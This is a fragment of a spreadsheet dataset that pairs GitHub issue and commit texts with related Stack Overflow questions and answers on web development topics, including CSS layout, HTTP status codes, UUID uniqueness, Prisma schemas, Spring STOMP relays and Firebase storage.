&lt;p&gt;This will keep the &lt;code&gt;input&lt;/code&gt; inside its container.
Now if you do want the borders, wrap the &lt;code&gt;input&lt;/code&gt; in a &lt;code&gt;div&lt;/code&gt;, with the borders set on the &lt;code&gt;div&lt;/code&gt; (that way you can remove the &lt;code&gt;display:block&lt;/code&gt; from the &lt;code&gt;input&lt;/code&gt; too). Something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div style="border:1px solid gray;"&amp;gt;
 &amp;lt;input type="text" class="wide" /&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;
Another option is to, instead of removing the style from the &lt;code&gt;input&lt;/code&gt;, compensate for it in the wrapped &lt;code&gt;div&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;input.wide {width:100%;}
&amp;lt;div style="padding-right:4px;padding-left:1px;margin-right:2px"&amp;gt;
  &amp;lt;input type="text" class="wide" /&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will give you somewhat different results in different browsers, but they will not overlap the container. The values in the div depend on how large the border is on the &lt;code&gt;input&lt;/code&gt; and how much space you want between the &lt;code&gt;input&lt;/code&gt; and the border.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The server:&lt;/p&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;public interface MyClient {
   @GetMapping(value = &amp;quot;mypath&amp;quot;)
   String getStuff(@RequestParam MyDto myDto);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;@RestController
public class MyClientRestController implements MyClient {
   String getStuff(MyDto myDto) {
      return myDto.toString(); 
   }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The Feign config:&lt;/p&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;@FeignClient(name = &amp;quot;myserver&amp;quot;, url = &amp;quot;${myurl}&amp;quot;, path = &amp;quot;/mypath&amp;quot;)
public interface MyFeignClient extends MyClient {}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The client call:&lt;/p&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;String foo = myFeignClient.getStuff(myDto);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Relevant parts of the error stack I get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;org.springframework.web.HttpRequestMethodNotSupportedException: Request method 'POST' is not supported
(...)
Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Request processing failed: feign.FeignException$InternalServerError: [500] during [GET] to [http://localhost.xxx:8080/mypath]`
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My guess is that Feign or Spring Boot sees a complex object and implies that it's a request body of a POST request.&lt;/p&gt;
&lt;p&gt;From a conversation with Gemini (AI), in case of a GET request, Feign and Spring Boot are supposed to convert the DTO into query params, but I can't make it work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C926</t>
  </si>
  <si>
    <t>The current NLPRP API specification states that if a client calls fetch_from_queue on a queue_id that is not yet finished processing, then the server should respond with HTTP status code 102 ("Processing"). However status codes below 200 are supposed to be "intermediate" codes and shouldn't be used as the final status of an HTTP exchange - the idea of 102 is that the server can return this intermediate code without closing the connection, as a way to say "I haven't died, I'm still working on it..." and then follow up with a final 200 or higher code when the processing is finished
However it's not clear what to suggest instead - it's not a 4xx client error (the request is perfectly valid, it's just that the result isn't yet ready) and it's not a 5xx server error (nothing has actually gone wrong). The most appropriate response would appear to be 202 Accepted:
6.3.3. 202 Accepted
The 202 (Accepted) status code indicates that the request has been accepted for processing, but the processing has not been completed. The request might or might not eventually be acted upon, as it might be disallowed when processing actually takes place. There is no facility in HTTP for re-sending a status code from an asynchronous operation.
The 202 response is intentionally noncommittal. Its purpose is to allow a server to accept a request for some other process (perhaps a batch-oriented process that is only run once per day) without requiring that the user agent's connection to the server persist until the process is completed. The representation sent with this response ought to describe the request's current status and point to (or embed) a status monitor that can provide the user with an estimate of when the request will be fulfilled.
Possibly with a response body where the server can indicate some kind of progress counter, if it is able to determine such (e.g. percentage of tasks completed so far).
Many thanks for this, and sorry for the delay!
I agree.
Other background docs of relevance:
https://www.rfc-editor.org/rfc/rfc2518.html#section-10.1 -- RFC2518 (WebDAV extensions), defining code 102 -- "Methods can potentially take a long period of time to process, especially methods that support the Depth header. In such cases the client may time-out the connection while waiting for a response. To prevent this the server may return a 102 (Processing) status code to indicate to the client that the server is still processing the method." -- but also "The server MUST send a final response after the request has been completed", i.e. that 102 means pending but only within a single request/response.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/202 -- another version of the 202 definition.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Status#information_responses -- overview of all response codes.
https://evertpot.com/http/102-processing and https://evertpot.com/http/202-accepted -- a blog on these.
https://softwareengineering.stackexchange.com/questions/316208/http-status-code-for-still-processing, https://stackoverflow.com/questions/51255241/what-http-status-code-should-i-use-for-processing-status-update, and https://stackoverflow.com/questions/9794696/which-http-status-code-means-not-ready-yet-try-again-later -- Stack Overflow discussions.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;code&gt;102 Processing&lt;/code&gt; is not a "normal" status code. Like the others in the 100 series, they act more like an 'intermediate' status code.&lt;/p&gt;
&lt;p&gt;When a server sends &lt;code&gt;102&lt;/code&gt; or &lt;code&gt;10x&lt;/code&gt;, it means that the client will continue to wait for a 'real' status code. So an actual single HTTP request might result in &lt;em&gt;all&lt;/em&gt; of the following HTTP status codes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;100&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;102&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;102&lt;/code&gt; (might appear more than once)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;103&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;103&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;200&lt;/code&gt; (finally got the real 'OK').&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Your use-case is &lt;em&gt;not&lt;/em&gt; an appropiate usage of &lt;code&gt;102&lt;/code&gt;, unless you keep the connection open and send more status-codes. Many HTTP clients don't have a built-in way to notify you of these 'intermediate statuses', but some do.&lt;/p&gt;
&lt;p&gt;Given that you're doing a sort of polling and you have a resource that represents 'the status of the image' (I'm imagining something like &lt;code&gt;/image/{upload-id}/status&lt;/code&gt; it's fine for that resource to return &lt;code&gt;200 OK&lt;/code&gt; both when the image has and has not been processed.&lt;/p&gt;
&lt;p&gt;Think about it this way, regardless of the image itself, the 'status of the image'-resource is always available and can return 200. &lt;/p&gt;
&lt;p&gt;Plug: I wrote a &lt;a href="https://evertpot.com/http/102-processing" rel="nofollow noreferrer"&gt;blog post&lt;/a&gt; about this code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I am in the design phase of writing a new Windows service application that accepts TCP/IP connections for long running connections (i.e., this is not like HTTP where there are many short connections, but rather a client connects and stays connected for hours or days or even weeks).
I'm looking for ideas for the best way to design the network architecture.  I'm going to need to start at least one thread for the service.  I am considering using the Asynch API (BeginRecieve, etc.) since I don't know how many clients I will have connected at any given time (possibly hundreds).  I definitely do not want to start a thread for each connection.
Data will primarily flow out to the clients from my server, but there will be some commands sent from the clients on occasion.  This is primarily a monitoring application in which my server sends status data periodically to the clients.
What is the best way to make this as scalable as possible? Basic workflow?
To be clear, I'm looking for .NET-based solutions (C# if possible, but any .NET language will work).
I would need a working example of a solution, either as a pointer to something I could download or a short example in-line.  And it must be .NET and Windows based (any .NET language is acceptable).
</t>
  </si>
  <si>
    <t>C927</t>
  </si>
  <si>
    <t>Write up Sync details
All records have _status and _changed fields:
if _status is created, it's a new record to push to server
if _status is updated, it's a record to update
when you pull data from server, and you have something updated on both client, and server, you have to resolve a conflict. there will be a helper function for it. But _changed will have comma-separated names of column names that were changed on client since last sync. you can use that to resolve the conflict (client-changed columns shall win over server)
to get records deleted on the client, use adapter.getDeletedRecords. this will give you IDs of stuff to delete on the server.
after sync, use adapter.destroyDeletedRecords to permanently remove records marked as deleted before, and created/updated records mark as _status='synced', _changed=''.
Again, there will be a few helper functions so that it's straightforward.
@fletling will you be able to find some time this week to take a look at #142 and give us feedback about the proposed API and sketch of the sync algorithm? I can already see that your case is specific enough you might not be able to use the "standard 🍉 sync", but that's also why I could use your feedback a) why isn't it possible for you to use per-database sync, or at least something closer to it but this GraphSQL abstraction, b) how can we structure the standard sync adapter implementation so that it's easier for people with special cases to reuse as much standard 🍉 code as possible
Sure! I left some comments in particular regarding the two questions a) and b) in here:
#142
Why? Why can't you use the same IDs locally as on the server? This is what we've been always doing, and I assumed there's no reason to treat local IDs separately
Theoretically it should be possible but let me describe some edge cases:
That’s generally a problem of being able to make sure that IDs are unique. I know that for instance with UUIDs there’s negligible chance of IDs not being unique (https://stackoverflow.com/questions/1155008/how-unique-is-uuid) but let’s assume they may not be random enough to be unique:
Let’s assume that there’s client (1) and (2) that due to bad luck generated the same ID x for a record. (1) already synced it’s record to the backend. So in the backend we have a record with ID x. Now (2) attempts to sync the record with ID x. The backend is going to reject it. (2) would now have to generate a new ID y and attempt to sync to the backend again. Also (2) needs to update all its relations to now use y instead of x. What happens when some part of these relations was already synced to the backend? Then also these need to be updated. Surely theoretically possible but definitely it would be better to just avoid this situation in the first place. And an easy solution to avoid this is to use client and server side IDs and just map them in the network layer of the synchronisation. That way the backend doesn’t have to be aware of multiple clients and the client doesn’t have to be aware of the backend side IDs at all.
See for instance https://softwareengineering.stackexchange.com/questions/287163/generation-of-ids-in-offline-online-application and https://softwareengineering.stackexchange.com/questions/236309/strategy-for-generating-unique-and-secure-identifiers-for-use-in-a-sometimes-of for some discussion around this topic.
Also this here is helpful: https://tech.trello.com/sync-two-id-problem/
Apart from that there’s also security considerations about generating IDs client side - on which I’m not an expert so I’d refer to some discussion thread here again: https://stackoverflow.com/questions/105034/create-guid-uuid-in-javascript?noredirect=1&amp;lq=1 and https://stackoverflow.com/questions/1296234/is-there-any-danger-to-creating-uuid-in-javascript-client-side</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Very safe: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;the annual risk of a given person being hit by a meteorite is
  estimated to be one chance in 17 billion, which means the
  probability is about 0.00000000006 (6 Ã— 10&lt;sup&gt;âˆ’11&lt;/sup&gt;), equivalent to the odds
  of creating a few tens of trillions of UUIDs in a year and having one
  duplicate. In other words, only after generating 1 billion UUIDs every
  second for the next 100 years, the probability of creating just one
  duplicate would be about 50%.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Caveat:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;However, these probabilities only hold when the UUIDs are generated
  using sufficient entropy. Otherwise, the probability of duplicates
  could be significantly higher, since the statistical dispersion might
  be lower. Where unique identifiers are required for distributed
  applications, so that UUIDs do not clash even when data from many
  devices is merged, the randomness of the seeds and generators used on
  every device must be reliable for the life of the application. Where
  this is not feasible, RFC4122 recommends using a namespace variant
  instead.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Source: The &lt;a href="https://en.wikipedia.org/w/index.php?title=Universally_unique_identifier&amp;amp;oldid=755882275#Random_UUID_probability_of_duplicates" rel="noreferrer"&gt;&lt;em&gt;Random UUID probability of duplicates&lt;/em&gt; section&lt;/a&gt; of the Wikipedia article on Universally unique identifiers (link leads to a revision from December 2016 before editing reworked the section).&lt;/p&gt;
&lt;p&gt;Also see the current section on the same subject on the same Universally unique identifier article, &lt;a href="https://en.wikipedia.org/wiki/Universally_unique_identifier#Collisions" rel="noreferrer"&gt;&lt;em&gt;Collisions&lt;/em&gt;&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to store business operating hours in PostgreSQL using Prisma, but I'm having trouble with the proper type mapping for TIME columns.&lt;/p&gt;
&lt;p&gt;My PostgreSQL table:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE public.operating_hours (
    day_of_week public.day_of_week NOT NULL,
    open_time time NOT NULL,
    close_time time NOT NULL
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried two approaches in my Prisma schema:&lt;/p&gt;
&lt;p&gt;Using String with VarChar:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;model OperatingHours {
    id        Int       @id @default(autoincrement())
    accountId String    @map(&amp;quot;account_id&amp;quot;) @db.Uuid
    dayOfWeek DayOfWeek @map(&amp;quot;day_of_week&amp;quot;)
    openTime  String    @map(&amp;quot;open_time&amp;quot;) @db.VarChar(8)
    closeTime String    @map(&amp;quot;close_time&amp;quot;) @db.VarChar(8)
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using DateTime with Time:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;model OperatingHours {
    id        Int       @id @default(autoincrement())
    accountId String    @map(&amp;quot;account_id&amp;quot;) @db.Uuid
    dayOfWeek DayOfWeek @map(&amp;quot;day_of_week&amp;quot;)
    openTime  DateTime  @map(&amp;quot;open_time&amp;quot;) @db.Time
    closeTime DateTime  @map(&amp;quot;close_time&amp;quot;) @db.Time
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With the String approach, I get type mismatch errors. With the DateTime approach, I'm unable to store time values like &amp;quot;14:30:00&amp;quot;.&lt;/p&gt;
&lt;p&gt;What is the correct way to map PostgreSQL TIME columns in Prisma schema for storing operating hours?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C928</t>
  </si>
  <si>
    <t>Provided on TCP client to WebSocket relay in order to work around DNS
 and SSL issues with Netty's default TCP client.
See reactor/reactor-netty#1431 , https://stackoverflow.com/questions/50846671/using-amazon-mq-as-a-broker-relay-for-spring-websockets-stomp , https://stackoverflow.com/questions/53105451/how-to-use-spring-messaging-5-1-to-connect-stompssl-broker</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Finally, the issue was with enabling the SSL protocol. Here's how I did it:&lt;/p&gt;
&lt;p&gt;1) I created a custom StompTcpFactory, to create a tcp client with SSL enabled:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/**
 * A TCP Client Factory to enable SSL connection
 */
public class StompTcpFactory implements NetStreams.TcpClientFactory&amp;lt;Message&amp;lt;byte[]&amp;gt;, Message&amp;lt;byte[]&amp;gt;&amp;gt; {
  private final Environment environment;
  private final EventLoopGroup eventLoopGroup;
  private final boolean ssl;
  private final List&amp;lt;String&amp;gt; addresses;
  public StompTcpFactory(List&amp;lt;String&amp;gt; addresses, boolean ssl) {
    this.addresses = addresses;
    this.ssl = ssl;
    this.environment = new Environment(
        () -&amp;gt; new ReactorConfiguration(Collections.emptyList(), "sync", new Properties()));
    this.eventLoopGroup = Reactor2TcpClient.initEventLoopGroup();
  }
  @Override
  public Spec.TcpClientSpec&amp;lt;Message&amp;lt;byte[]&amp;gt;, Message&amp;lt;byte[]&amp;gt;&amp;gt; apply(
      Spec.TcpClientSpec&amp;lt;Message&amp;lt;byte[]&amp;gt;, Message&amp;lt;byte[]&amp;gt;&amp;gt; tcpClientSpec) {
    Supplier&amp;lt;InetSocketAddress&amp;gt; supplier = new InetSocketAddressSupplier(addresses);
    return tcpClientSpec.env(environment).options(new NettyClientSocketOptions().eventLoopGroup(eventLoopGroup))
        .codec(new Reactor2StompCodec(new StompEncoder(), new StompDecoder())).ssl(ssl ? new SslOptions() : null)
        .connect(supplier);
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Notice the .ssl call to set the flag to use ssl. Also I receive a list of addresses to config the endpoints and a boolean to be able to turn on and off ssl (for dev) .The InetSocketAddressSupplier was created to switch between the 2 addresses that Amazon gives you when working with a HA setup:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/**
 * Address supplier for failover connection
 */
@Slf4j
public class InetSocketAddressSupplier implements Supplier&amp;lt;InetSocketAddress&amp;gt; {
  private static int counter = 0;
  private final List&amp;lt;String&amp;gt; addresses;
  InetSocketAddressSupplier(List&amp;lt;String&amp;gt; addresses) {
    Assert.notNull(addresses, "addresses list cannot be null");
    Assert.isTrue(!addresses.isEmpty() &amp;amp;&amp;amp; (addresses.size() == 2), "Addresses list must be of size 2");
    this.addresses = addresses;
  }
  @Override
  public InetSocketAddress get() {
    int serverIndex = counter % 2;
    counter++;
    String[] info = addresses.get(serverIndex).split(":");
    log.debug("Returning server {} {}:{} for connection", serverIndex, info[0], info[1]);
    return new InetSocketAddress(info[0], Integer.valueOf(info[1]));
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you don't need the HA setup, you can simply create an inline supplier as it's shown in &lt;a href="https://docs.spring.io/spring/docs/4.3.18.RELEASE/spring-framework-reference/htmlsingle/#websocket-stomp-handle-broker-relay-configure" rel="nofollow noreferrer"&gt;Spring docs&lt;/a&gt;. &lt;/p&gt;
&lt;p&gt;2) You can then configure your websocket endpoint to use this factory to create the client, and also set the user/password for the system and client connections:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Slf4j
@Configuration
@EnableWebSocketMessageBroker
public class WebSocketConfiguration extends AbstractWebSocketMessageBrokerConfigurer {
  @Qualifier("websocket")
  private MessageBrokerProperties config;
  private InetSocketAddressSupplier supplier;
  public WebSocketConfiguration(MessageBrokerProperties config) {
    this.config = config;
    this.supplier = new InetSocketAddressSupplier(config.getAddresses());
  }
  @Override
  public void configureMessageBroker(MessageBrokerRegistry registry) {
    InetSocketAddress address = supplier.get();
    registry.enableStompBrokerRelay("/topic").setRelayHost(address.getHostName()).setRelayPort(address.getPort())
        .setSystemLogin(config.getSystemLogin()).setSystemPasscode(config.getSystemPasscode())
        .setClientLogin(config.getClientLogin()).setClientPasscode(config.getClientPasscode())
        .setTcpClient(createTcpClient());
    registry.setApplicationDestinationPrefixes("/app");
  }
  private TcpOperations&amp;lt;byte[]&amp;gt; createTcpClient() {
    return new Reactor2TcpClient&amp;lt;&amp;gt;(new StompTcpFactory(config.getAddresses(), config.isUseSSL()));
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Hope it helps...&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I recently started with WCF ( yeah I know I am behind :-) ). The question is how I must structure it.
I am used to DAL,BL and Presentation Layer. I am replacing( sort of) my DAL with entity framework.
So I have this so far
DAL(entity framwork) --&gt; 
BL --&gt; 
contracts (datacontract messagecontrol service contract behaviours etc) --&gt;
service implementation --&gt;
client.
The question is  there a layer between bl and the contracts that converts( lack of a better word) the bl into the data contract.
Ex
DAL.Customer(Entity Framework) --&gt; BL (Rules) -- &gt; Converter (Just converting) --&gt; Contracts.Customer
OR
DAL.Customer(Entity Framework) --&gt; BL (Rules) -- &gt; Converter (Calling BL and converting.  converter implementing service contract) --&gt; Contracts.Customer.
thanks
</t>
  </si>
  <si>
    <t>C929</t>
  </si>
  <si>
    <t>In the case of requests with 0 responses, consider passing this response to the frontend instead of returning a 404 from the API. See original thread #544 (comment) also related issue #1173
Acceptance criteria
 justification of keep the 404 or implementation of a switch to a 204, empty array (0 responses)
 no visual change are expected in the frontend (but how responses are dealt with might need updating) - this might require changes in the frontend code
 all tests pass
fter some searching on the web, I have uncovered the following views:
"An empty response should use an empty body and a 204 status code."
https://softwareengineering.stackexchange.com/a/211287/36121
PayPal uses 4xx to signal errors ("failed requests"), 2xx to signal successful requests and 204 for empty responses.
https://developer.paypal.com/api/rest/responses/
"An empty response should use a body with an empty object ({}, or [] as appropriate) and a 200 status code. This is appropriate for a JSON API."
"A JSON API must return a valid JSON document if the request is handled (and a JSON document should not be empty)"
https://softwareengineering.stackexchange.com/a/271171/36121
https://jsonapi.org/format/#fetching-resources
https://stackoverflow.blog/2020/03/02/best-practices-for-rest-api-design/#h-accept-and-respond-with-json
https://softwareengineering.stackexchange.com/a/199831/36121
"If an empty array is an acceptable representation of the (lack of) resource, then return that with a 200 status code"
https://stackoverflow.com/a/56408194/931027
"Some client frameworks that expect a JSON response turn responses with status 204 into errors."
https://weblog.west-wind.com/posts/2020/Feb/24/Null-API-Responses-and-HTTP-204-Results-in-ASPNET-Core
"Respond with 200 and an empty array if the query results in an empty response."
https://softwareengineering.stackexchange.com/a/199758/36121
https://softwareengineering.stackexchange.com/a/227972/36121
"The difference between 204 (or 200) and 404 is that 404 signals an error in the query or that a parameter had an invalid value, while 204 (or 200) is used when the query is correct but generates an empty result."
"204 means something was found, but it was empty."
https://softwareengineering.stackexchange.com/a/322953/36121
https://softwareengineering.stackexchange.com/a/257579/36121
"Use 404 when the query is using an invalid value."
https://softwareengineering.stackexchange.com/a/199758/36121
"A status code of 404 should not be used in responses from RESTful APIs"
"A status code of 4xx indicates an error with the request."
https://stackoverflow.com/a/56408194/931027
"I would avoid responding with a 404 since it does not tell the client why they got the error (empty response or error in the URL). It is better to return 200 or 204."
https://stackoverflow.com/a/56409201/931027</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
&lt;p&gt;so how about code 204?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;In HTTP, &lt;a href="https://www.rfc-editor.org/rfc/rfc7231#section-6.3.5" rel="noreferrer"&gt;204 No Content&lt;/a&gt; means something very specific -- that the message body is zero bytes long.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The 204 (No Content) status code indicates that the server has successfully fulfilled the request and that there is no additional content to send in the response payload body.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So you shouldn't be thinking about it if you are sending, for example, a json encoded document.&lt;/p&gt;
&lt;p&gt;If an empty list is an acceptable representation of the resource, then using &lt;code&gt;200&lt;/code&gt; as the response code is fine.  For instance, consider this URI for stack overflow itself.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://stackoverflow.com/questions/tagged/cqrs+or+domain-driven-design+or+event-sourcing?sort=newest&amp;amp;page=999&amp;amp;pagesize=15"&gt;https://stackoverflow.com/questions/tagged/cqrs+or+domain-driven-design+or+event-sourcing?sort=newest&amp;amp;page=999&amp;amp;pagesize=15&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;As of 2019-06-01, there are many fewer than 999 pages of questions with these tags, but the server has no problem computing the correct representation for this page (including the information that the highest numbered page is 426).  Therefore, the semantics of &lt;code&gt;200&lt;/code&gt; are perfectly suitable.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;404&lt;/code&gt; means that no representation for the resource was available.  All &lt;code&gt;4xx&lt;/code&gt; class response codes indicate an error with the request -- in this case, it suggests that the client made a mistake with the URI.  That could be a temporary condition (you shouldn't be asking about that resource right now).  So that could also be fine, if what you want to indicate is that the client has left the happy path of the domain protocol.&lt;/p&gt;
&lt;p&gt;How to choose?  I start from this observation in the &lt;a href="https://www.rfc-editor.org/rfc/rfc7231#section-6.5" rel="noreferrer"&gt;HTTP specification&lt;/a&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;the server SHOULD send a representation containing an explanation of the error situation, and whether it is a temporary or permanent condition.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So which is useful to the client?  A representation of the problem, or a representation of an empty collection?  This can be a challenging question when the same resources are being used for different things.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a two column table, which I would like the first column sized to fit max-content and the second column to take the remaining space. Neither column has a defined absolute or percentage width. I also need the table to be fixed width and not expand past the parent element.&lt;/p&gt;
&lt;p&gt;The second column will have content that overflows the table width with nowrap. Overflow doesn't work, as the table element expands to fit the content past the parent element's width. If I use table-layout:fixed with 100% width, the table is constrained to the parent width, but I am no longer able to use max-content to size the first column and have the second column take up the remaining space.&lt;/p&gt;
&lt;p&gt;Examples:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://jsfiddle.net/jmvs5gfq/1/" rel="nofollow noreferrer"&gt;https://jsfiddle.net/jmvs5gfq/1/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false" data-babel-preset-react="false" data-babel-preset-ts="false"&gt;_x000D_
&lt;div class="snippet-code"&gt;_x000D_
&lt;pre class="snippet-code-css lang-css prettyprint-override"&gt;&lt;code&gt;div {
width:600px;
border:1px solid blue;
}
table {
border-collapse: collapse;
width: 100%;
}
td {
border: 1px dotted black;
white-space:nowrap;
}
td:first-of-type {
min-width: max-content;
}
td:last-of-type {
overflow: hidden;
text-overflow: ellipsis;
}
.fixed {
table-layout: fixed;
}&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;pre class="snippet-code-html lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;div&amp;gt;
&amp;lt;table class="fixed"&amp;gt;
&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Entry 1:&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;"Lorem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laborum."&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Entry 23:&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;"Lorem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laborum."&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Entry 487248231:&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;"Lorem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laborum."&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;br&amp;gt;
&amp;lt;div&amp;gt;
&amp;lt;table&amp;gt;
&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Entry 1:&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;"Lorem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laborum."&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Entry 23:&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;"Lorem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laborum."&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Entry 487248231:&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;"Lorem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laborum."&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/p&gt;
&lt;p&gt;The first div contains a table that is constrained to the div, with overflow applying properly, but the column sizes are absolute. Setting the column sizes to 1% or 100% do not take into account the content, per table-layout:fixed. max-content is ignored.&lt;/p&gt;
&lt;p&gt;The second div contains a table that expands past the parent div. The first column is the correct size, expanding to fit the content. The second column expands the entire table to fit, instead of overflowing, which is undesirable.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C93</t>
  </si>
  <si>
    <t>Added login signup database design
In this commit, we have added and solved several features and problems:
-&gt;Created a LogIn and Registration activity.
When the app is opened, the login page will be displayed by default. Users can login using their email and password (we will add a "forget password" option soon). If the user is a new user, they can click the "signup" button and be redirected to the signup page. In the signup page, users can signup using their name, email, and password, and their user profile will be created in our database. We have also added a background image to the login and registration pages.
-&gt;Created a "show uploaded image" button in the main activity.
When clicked, it will take the user to an "UserActivity" page.
-&gt;Created an UserActivity page to display the uploaded images by the user.
Here, users can see all the images they have uploaded till now with its upload time and geo-tags in a custom-list format (using recyclerview)(you must be logged in to open this page). We have taken reference from the following Github link for the recyclerview and custom list: https://github.com/foxandroid/RealtimeRecyclerView/tree/master/app/src/main/java/com/example/realtimerecyclerview and youtube link : https://youtu.be/M8sKwoVjqU0
-&gt;Stored and correctly fetched the download URL of the uploaded image.
In the previous version, the download URL of the image was not fetched correctly, so we have corrected that by using the getDownloadURL() method and adding an onSuccessListener on this method which generates the URI of the uploaded image. We have taken reference from the following StackOverflow link for the download URL: https://stackoverflow.com/a/37379251
-&gt;Created proper database storage in a nice and formatted way (multi-level nodes).
The structure of the storage is as follows:
users(root)-&gt;userid-&gt;{userId,username,email,password,joindate,uploadedImages-&gt;{datetime-&gt;{imageUrl,latitude,longitude,timeofupload}}}
We have taken reference from the following youtube video link for the database storage: https://youtu.be/M8sKwoVjqU0</t>
  </si>
  <si>
    <t>Please refer to the documentation for getting a download URL.
When you call getDownloadUrl(), the call is asynchronous and you must subscribe on a success callback to obtain the results:
// Calls the server to securely obtain an unguessable download Url
private void getUrlAsync (String date){
    // Points to the root reference
    StorageReference storageRef = FirebaseStorage.getInstance().getReference();
    StorageReference dateRef = storageRef.child("/" + date+ ".csv");
    dateRef.getDownloadUrl().addOnSuccessListener(new OnSuccessListener&lt;Uri&gt;()
    {
        @Override
        public void onSuccess(Uri downloadUrl) 
        {                
           //do something with downloadurl
        } 
    });
}
This will return a public unguessable download url. If you just uploaded a file, this public url will be in the success callback of the upload (you do not need to call another async method after you've uploaded).
However, if all you want is a String representation of the reference, you can just call .toString()
// Returns a Uri of the form gs://bucket/path that can be used
// in future calls to getReferenceFromUrl to perform additional
// actions
private String niceRefLink (String date){
    // Points to the root reference
    StorageReference storageRef = FirebaseStorage.getInstance().getReference();
    StorageReference dateRef = storageRef.child("/" + date+ ".csv");
    return dateRef.toString();
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been playing around with gitea runners and trying to get deployments of my custom apps to work through docker. I host local gitea and want to build and push docker image as part of push action. Here is my yaml:&lt;/p&gt;
